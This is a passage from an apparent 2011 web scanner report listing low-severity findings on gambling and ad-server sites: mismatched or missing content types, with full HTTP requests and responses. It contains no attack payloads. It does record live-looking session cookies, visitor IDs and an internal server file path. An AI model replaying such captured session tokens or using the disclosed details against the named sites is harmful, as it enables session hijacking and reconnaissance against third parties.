The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /outbound/article/www.interwetten.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

26.16. http://www.neogames.com/outbound/article/www.postcodelottery.co.uk

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.neogames.com
Path:   /outbound/article/www.postcodelottery.co.uk

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /outbound/article/www.postcodelottery.co.uk HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

26.17. http://www.neogames.com/outbound/article/www.winnings.com

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.neogames.com
Path:   /outbound/article/www.winnings.com

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /outbound/article/www.winnings.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

26.18. http://www.winnings.com/wp-admin/admin-ajax.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.winnings.com
Path:   /wp-admin/admin-ajax.php

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /wp-admin/admin-ajax.php HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 26 Jul 1997 05:00:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Date: Mon, 16 May 2011 12:35:30 GMT
Connection: close
Content-Length: 2

-1

27. Content type is not specified

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1703625 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:14 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:14 GMT
Pragma: no-cache
Content-Length: 4293
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
